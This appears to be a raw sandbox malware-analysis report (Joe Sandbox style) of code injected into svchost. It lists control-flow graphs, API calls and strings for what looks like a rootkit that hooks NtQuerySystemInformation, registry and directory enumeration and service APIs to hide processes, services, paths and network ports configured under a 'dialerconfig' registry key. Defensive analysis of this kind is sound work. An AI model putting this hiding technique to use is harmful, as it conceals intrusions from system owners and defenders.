2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14267->14268 14269 2c06fd5113c 14268->14269 14270 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14269->14270 14271 2c06fd51148 14270->14271 14272 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14271->14272 14273 2c06fd51154 14272->14273 14274 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14273->14274 14274->14241 14276 2c06fd51044 14275->14276 14277 2c06fd51058 14275->14277 14276->14277 14278 2c06fd4b8d8 Concurrency::details::SchedulerProxy::DeleteThis GetProcAddress 14276->14278 14277->14244 14278->14276 14279 2c06fd41c28 14285 2c06fd41650 GetProcessHeap 14279->14285 14281 2c06fd41c3e Sleep SleepEx 14283 2c06fd41c37 14281->14283 14283->14281 14284 2c06fd415c0 StrCmpIW StrCmpW 14283->14284 14330 2c06fd418dc 14283->14330 14284->14283 14286 2c06fd41670 _set_errno_from_matherr 14285->14286 14348 2c06fd41274 GetProcessHeap 14286->14348 14288 2c06fd41678 14289 2c06fd41274 2 API calls 14288->14289 14290 2c06fd41689 14289->14290 14291 2c06fd41274 2 API calls 14290->14291 14292 2c06fd41692 14291->14292 14293 2c06fd41274 2 API calls 14292->14293 14294 2c06fd4169b 14293->14294 14295 2c06fd416b6 RegOpenKeyExW 14294->14295 14296 2c06fd418ce 14295->14296 14297 2c06fd416e8 RegOpenKeyExW 14295->14297 14296->14283 14298 2c06fd41727 RegOpenKeyExW 14297->14298 14299 2c06fd41711 14297->14299 14301 2c06fd41762 RegOpenKeyExW 14298->14301 14302 2c06fd4174b 14298->14302 14352 2c06fd412c8 RegQueryInfoKeyW 14299->14352 14305 2c06fd41786 14301->14305 14306 2c06fd4179d RegOpenKeyExW 14301->14306 14363 2c06fd4104c RegQueryInfoKeyW 14302->14363 14303 2c06fd4171d RegCloseKey 14303->14298 14308 2c06fd412c8 11 API calls 14305->14308 14309 2c06fd417c1 14306->14309 14310 2c06fd417d8 RegOpenKeyExW 14306->14310 14311 2c06fd41793 RegCloseKey 14308->14311 14312 2c06fd412c8 11 API calls 14309->14312 14313 2c06fd41813 RegOpenKeyExW 14310->14313 14314 2c06fd417fc 14310->14314 14311->14306 14318 2c06fd417ce RegCloseKey 14312->14318 14316 2c06fd41837 14313->14316 14317 2c06fd4184e RegOpenKeyExW 14313->14317 14315 2c06fd412c8 11 API calls 14314->14315 14319 2c06fd41809 RegCloseKey 14315->14319 14320 2c06fd4104c 4 API calls 14316->14320 14321 2c06fd41872 14317->14321 14322 2c06fd41889 RegOpenKeyExW 14317->14322 14318->14310 14319->14313 14323 2c06fd41844 RegCloseKey 14320->14323 14324 2c06fd4104c 4 API calls 14321->14324 14325 2c06fd418c4 RegCloseKey 14322->14325 14326 2c06fd418ad 14322->14326 14323->14317 14327 2c06fd4187f RegCloseKey 14324->14327 14325->14296 14328 2c06fd4104c 4 API calls 14326->14328 14327->14322 14329 2c06fd418ba RegCloseKey 14328->14329 14329->14325 14376 2c06fd414b4 14330->14376 14369 2c06fd53170 14348->14369 14351 2c06fd412ba _set_errno_from_matherr 14351->14288 14353 2c06fd41334 GetProcessHeap 14352->14353 14354 2c06fd41499 Concurrency::details::SchedulerProxy::DeleteThis 14352->14354 14362 2c06fd4134b Concurrency::details::SchedulerProxy::DeleteThis _set_errno_from_matherr 14353->14362 14354->14303 14355 2c06fd41485 GetProcessHeap 14355->14354 14356 2c06fd4135d RegEnumValueW 14356->14362 14358 2c06fd413dd GetProcessHeap 14358->14362 14359 2c06fd4142f lstrlenW GetProcessHeap 14359->14362 14360 2c06fd41454 StrCpyW 14360->14362 14361 2c06fd41413 GetProcessHeap 14361->14362 14362->14355 14362->14356 14362->14358 14362->14359 14362->14360 14362->14361 14371 2c06fd41554 14362->14371 14364 2c06fd411b5 RegCloseKey 14363->14364 14365 2c06fd410b9 Concurrency::details::SchedulerProxy::DeleteThis _set_errno_from_matherr 14363->14365 14364->14301 14365->14364 14366 2c06fd410c7 RegEnumValueW 14365->14366 14367 2c06fd41149 GetProcessHeap 14365->14367 14368 2c06fd4117f GetProcessHeap 14365->14368 14366->14365 14367->14365 14368->14365 14370 2c06fd4128f GetProcessHeap 14369->14370 14370->14351 14372 2c06fd415a4 14371->14372 14373 2c06fd4156e 14371->14373 14372->14362 14373->14372 14374 2c06fd41585 StrCmpIW 14373->14374 14375 2c06fd4158d StrCmpW 14373->14375 14374->14373 14375->14373 14377 2c06fd414f0 GetProcessHeap 14376->14377 14378 2c06fd414d1 GetProcessHeap 14376->14378 14380 2c06fd41505 Concurrency::details::SchedulerProxy::DeleteThis 14377->14380 14379 2c06fd414ea Concurrency::details::SchedulerProxy::DeleteThis 14378->14379 14379->14377 14379->14378 14380->14380 14381 2c06fd4152a GetProcessHeap HeapFree 14380->14381

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: a199c9e606cde0bcb41938825182d98f317668442cb62c32ec3da268671c5b1e
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: 53417133214B80D7EB658F61E488B9EB7A6F389B84F108125DB8907B58DF39E174CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: c53c9aee286932cc07a73740aeb3d2f6a4814bd33fbf37612aa41a45f7e57298
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 34113960610601D2FF21AF29E8CFFAD62DFA754304F7400259A0A85194EF3BE0B4A210

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000002C06FD41650: GetProcessHeap.KERNEL32 ref: 000002C06FD4165B
                                                                                  • Part of subcall function 000002C06FD41650: HeapAlloc.KERNEL32 ref: 000002C06FD4166A
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD416DA
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41707
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41721
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41741
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD4175C
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4177C
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41797
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417B7
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD417D2
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417F2
                                                                                • Sleep.KERNEL32 ref: 000002C06FD41C43
                                                                                • SleepEx.KERNELBASE ref: 000002C06FD41C49
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD4180D
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4182D
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41848
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41868
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41883
                                                                                  • Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD418A3
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD418BE
                                                                                  • Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD418C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: f875fc6a0e9d98c1947966041f34012ff89924ce0ce28e87e090021eb28f4332
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 1731B1A5200601D1FF52AF36D9C9B6E17EFAB44BD8F345021DE0987696EF36E8708250

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 75 2c06fd43930-2c06fd4393b 76 2c06fd43955-2c06fd4395c 75->76 77 2c06fd4393d-2c06fd43950 StrCmpNIW 75->77 77->76 78 2c06fd43952 77->78 78->76
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction ID: c2951648c6b7cf44490d470145f2040370dc48019229244d0ed3b7e3bb55ef3c
                                                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction Fuzzy Hash: F9D0A72131170BC6FF54DFA5C8CBB68239BEB04704F548020CA0142114E72AADADDB10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 79 2c06f7b2908-2c06f7b2973 call 2c06f7b0f34 * 4 88 2c06f7b2b8b 79->88 89 2c06f7b2979-2c06f7b297c 79->89 90 2c06f7b2b8d-2c06f7b2ba9 88->90 89->88 91 2c06f7b2982-2c06f7b2985 89->91 91->88 92 2c06f7b298b-2c06f7b298e 91->92 92->88 93 2c06f7b2994-2c06f7b29b2 92->93 93->88 95 2c06f7b29b8-2c06f7b29dc call 2c06f7b0d6c 93->95 98 2c06f7b2a0b-2c06f7b2a12 95->98 99 2c06f7b29de-2c06f7b2a09 call 2c06f7b0d6c 95->99 101 2c06f7b2a18-2c06f7b2a25 98->101 102 2c06f7b2ab2-2c06f7b2ab9 98->102 99->98 101->102 106 2c06f7b2a2b-2c06f7b2a39 LoadLibraryA 101->106 103 2c06f7b2abf-2c06f7b2ad6 102->103 104 2c06f7b2b6c-2c06f7b2b89 102->104 103->104 107 2c06f7b2adc 103->107 104->90 108 2c06f7b2a3b-2c06f7b2a45 106->108 109 2c06f7b2a9d-2c06f7b2aa5 106->109 112 2c06f7b2ae2-2c06f7b2af7 107->112 113 2c06f7b2a48-2c06f7b2a4c 108->113 109->106 110 2c06f7b2aa7-2c06f7b2aac 109->110 110->102 114 2c06f7b2b5b-2c06f7b2b66 112->114 115 2c06f7b2af9-2c06f7b2b0a 112->115 116 2c06f7b2a9a 113->116 117 2c06f7b2a4e-2c06f7b2a52 113->117 114->104 114->112 121 2c06f7b2b0c-2c06f7b2b13 115->121 122 2c06f7b2b15-2c06f7b2b19 115->122 116->109 118 2c06f7b2a7d-2c06f7b2a87 117->118 119 2c06f7b2a54-2c06f7b2a7b 117->119 123 2c06f7b2a8d-2c06f7b2a98 118->123 119->123 124 2c06f7b2b48-2c06f7b2b59 121->124 125 2c06f7b2b1b-2c06f7b2b22 122->125 126 2c06f7b2b24-2c06f7b2b28 122->126 123->113 124->114 124->115 125->124 127 2c06f7b2b3a-2c06f7b2b3e 126->127 128 2c06f7b2b2a-2c06f7b2b38 126->128 127->124 129 2c06f7b2b40-2c06f7b2b43 127->129 128->124 129->124
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: 431c15bf0da77f514971a714979d07dfae198914b74046ec2d3b29537a4f07ff
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 02612022702250C7FB69CF95D488F6DF399FB05B94F248025DE1907784EB3AEA62C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
                                                                                • Instruction ID: 200bac7fa58e0e572d992cd4ef0606b832f4c12cf6a35b014a560acbc1825d99
                                                                                • Opcode Fuzzy Hash: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
                                                                                • Instruction Fuzzy Hash: 45F01551701245C5FE647FB2E9CDF6D61CA6B88BA0F684A305D3A862C2EA3BE4718211

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 251 2c06fd42cdc-2c06fd42d55 call 2c06fd5ecc0 254 2c06fd43090-2c06fd430b3 251->254 255 2c06fd42d5b-2c06fd42d61 251->255 255->254 256 2c06fd42d67-2c06fd42d6a 255->256 256->254 257 2c06fd42d70-2c06fd42d73 256->257 257->254 258 2c06fd42d79-2c06fd42d89 GetModuleHandleA 257->258 259 2c06fd42d9d 258->259 260 2c06fd42d8b-2c06fd42d9b GetProcAddress 258->260 261 2c06fd42da0-2c06fd42dbe 259->261 260->261 261->254 263 2c06fd42dc4-2c06fd42de3 StrCmpNIW 261->263 263->254 264 2c06fd42de9-2c06fd42ded 263->264 264->254 265 2c06fd42df3-2c06fd42dfd 264->265 265->254 266 2c06fd42e03-2c06fd42e0a 265->266 266->254 267 2c06fd42e10-2c06fd42e23 266->267 268 2c06fd42e25-2c06fd42e31 267->268 269 2c06fd42e33 267->269 270 2c06fd42e36-2c06fd42e3a 268->270 269->270 271 2c06fd42e3c-2c06fd42e48 270->271 272 2c06fd42e4a 270->272 273 2c06fd42e4d-2c06fd42e57 271->273 272->273 274 2c06fd42f4d-2c06fd42f51 273->274 275 2c06fd42e5d-2c06fd42e60 273->275 276 2c06fd42f57-2c06fd42f5a 274->276 277 2c06fd43082-2c06fd4308a 274->277 278 2c06fd42e72-2c06fd42e7c 275->278 279 2c06fd42e62-2c06fd42e6f call 2c06fd41a14 275->279 283 2c06fd42f5c-2c06fd42f68 call 2c06fd41a14 276->283 284 2c06fd42f6b-2c06fd42f75 276->284 277->254 277->267 281 2c06fd42eb0-2c06fd42eba 278->281 282 2c06fd42e7e-2c06fd42e8b 278->282 279->278 287 2c06fd42ebc-2c06fd42ec9 281->287 288 2c06fd42eea-2c06fd42eed 281->288 282->281 286 2c06fd42e8d-2c06fd42e9a 282->286 283->284 290 2c06fd42fa5-2c06fd42fa8 284->290 291 2c06fd42f77-2c06fd42f84 284->291 295 2c06fd42e9d-2c06fd42ea3 286->295 287->288 296 2c06fd42ecb-2c06fd42ed8 287->296 297 2c06fd42eef-2c06fd42ef9 call 2c06fd41d28 288->297 298 2c06fd42efb-2c06fd42f08 lstrlenW 288->298 293 2c06fd42fb5-2c06fd42fc2 lstrlenW 290->293 294 2c06fd42faa-2c06fd42fb3 call 2c06fd41d28 290->294 291->290 292 2c06fd42f86-2c06fd42f93 291->292 300 2c06fd42f96-2c06fd42f9c 292->300 306 2c06fd42fc4-2c06fd42fce 293->306 307 2c06fd42fe5-2c06fd42fef call 2c06fd43930 293->307 294->293 311 2c06fd42ffa-2c06fd43005 294->311 304 2c06fd42f43-2c06fd42f48 295->304 305 2c06fd42ea9-2c06fd42eae 295->305 308 2c06fd42edb-2c06fd42ee1 296->308 297->298 297->304 301 2c06fd42f0a-2c06fd42f14 298->301 302 2c06fd42f2b-2c06fd42f3d call 2c06fd43930 298->302 310 2c06fd42f9e-2c06fd42fa3 300->310 300->311 301->302 312 2c06fd42f16-2c06fd42f29 call 2c06fd41554 301->312 302->304 315 2c06fd42ff2-2c06fd42ff4 302->315 304->315 305->281 305->295 306->307 316 2c06fd42fd0-2c06fd42fe3 call 2c06fd41554 306->316 307->315 308->304 317 2c06fd42ee3-2c06fd42ee8 308->317 310->290 310->300 320 2c06fd43007-2c06fd4300b 311->320 321 2c06fd4307c-2c06fd43080 311->321 312->302 312->304 315->277 315->311 316->307 316->311 317->288 317->308 326 2c06fd43013-2c06fd4302d call 2c06fd486a0 320->326 327 2c06fd4300d-2c06fd43011 320->327 321->277 330 2c06fd43030-2c06fd43033 326->330 327->326 327->330 333 2c06fd43035-2c06fd43053 call 2c06fd486a0 330->333 334 2c06fd43056-2c06fd43059 330->334 333->334 334->321 336 2c06fd4305b-2c06fd43079 call 2c06fd486a0 334->336 336->321
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: e3ee47866cff61545546f44a158e128c6dc66d2f2c0619a6169b93d52d2f0f5b
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: E5B1D172210A50C2FF658F2AC489BAD63EAFB44B89F645116EE4993794DF37EC60D340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: 89cdadd8c149096420b7902b47dd2e0f96c6f4b8536fb5c011aa3cf96c3d587b
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 0E31A072205B80DAFF609F60E884BED73AAF784744F54452ADA4E47B98EF39C658C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 46e98df112fb04af7edad637ab195c16b85d4997b369ee7fb7328cebb6f9520c
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: BD31A032204F80D6EB20CF24E884B9E73AAF788754F600126EA9D47B99DF39C565CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: 7fd8dfed8afbdb916fab0a86991f891fa3a4b7d53afc99eb7d188b36701e131e
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: 69E1F032B04A81DAFB00CF64D488BDD7BBAF3457C8F249116DE4A57B99DA39D42AC700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 7fdffcc956c09322305df7fdf156fa11874812b82149af1904002b6e89e895f0
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: 03712926310B50C6FF119F65E8C9B9D27AAFB88B89F501111DE4D97B28EF3AD468C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 12b1175003206c3c8734227f7cb45702c047fc1fc527c8af9a3728a4e90b6891
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 6D513772214B44D2FF15DF62E589B9EB3AAF788B80F148124DA9907B14DF39E075C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 860c323db0625b6309e167cf1ba6b3dee5232e2f11ef1652efb44f843d078e04
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 1C31B4A111095AE0FF04EFA5E8DDFDC236BBB94349FE04413951982165DE3AE27EC790

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: b6e1415f3fae056ff5b8c3054efa91bc2a55c791f8b4cfbfefff056fe1b9c39c
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 25214C36614B40C3FB10CF25E489B5E77A6F389BA9F604215EA5947BA8CF3DD159CB00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 349 2c06f7b69f0-2c06f7b69f6 350 2c06f7b69f8-2c06f7b69fb 349->350 351 2c06f7b6a31-2c06f7b6a3b 349->351 352 2c06f7b69fd-2c06f7b6a00 350->352 353 2c06f7b6a25-2c06f7b6a64 call 2c06f7b70a0 350->353 354 2c06f7b6b58-2c06f7b6b6d 351->354 355 2c06f7b6a18 __scrt_dllmain_crt_thread_attach 352->355 356 2c06f7b6a02-2c06f7b6a05 352->356 369 2c06f7b6a6a-2c06f7b6a7f call 2c06f7b6f34 353->369 370 2c06f7b6b32 353->370 357 2c06f7b6b6f 354->357 358 2c06f7b6b7c-2c06f7b6b96 call 2c06f7b6f34 354->358 364 2c06f7b6a1d-2c06f7b6a24 355->364 360 2c06f7b6a11-2c06f7b6a16 call 2c06f7b6fe4 356->360 361 2c06f7b6a07-2c06f7b6a10 356->361 362 2c06f7b6b71-2c06f7b6b7b 357->362 372 2c06f7b6b98-2c06f7b6bcd call 2c06f7b705c call 2c06f7b6efc call 2c06f7b73f8 call 2c06f7b7210 call 2c06f7b7234 call 2c06f7b708c 358->372 373 2c06f7b6bcf-2c06f7b6c00 call 2c06f7b7270 358->373 360->364 381 2c06f7b6b4a-2c06f7b6b57 call 2c06f7b7270 369->381 382 2c06f7b6a85-2c06f7b6a96 call 2c06f7b6fa4 369->382 374 2c06f7b6b34-2c06f7b6b49 370->374 372->362 383 2c06f7b6c02-2c06f7b6c08 373->383 384 2c06f7b6c11-2c06f7b6c17 373->384 381->354 402 2c06f7b6a98-2c06f7b6abc call 2c06f7b73bc call 2c06f7b6eec call 2c06f7b6f18 call 2c06f7b90dc 382->402 403 2c06f7b6ae7-2c06f7b6af1 call 2c06f7b7210 382->403 383->384 388 2c06f7b6c0a-2c06f7b6c0c 383->388 389 2c06f7b6c19-2c06f7b6c23 384->389 390 2c06f7b6c5e-2c06f7b6c74 call 2c06f7b2858 384->390 396 2c06f7b6cff-2c06f7b6d0c 388->396 397 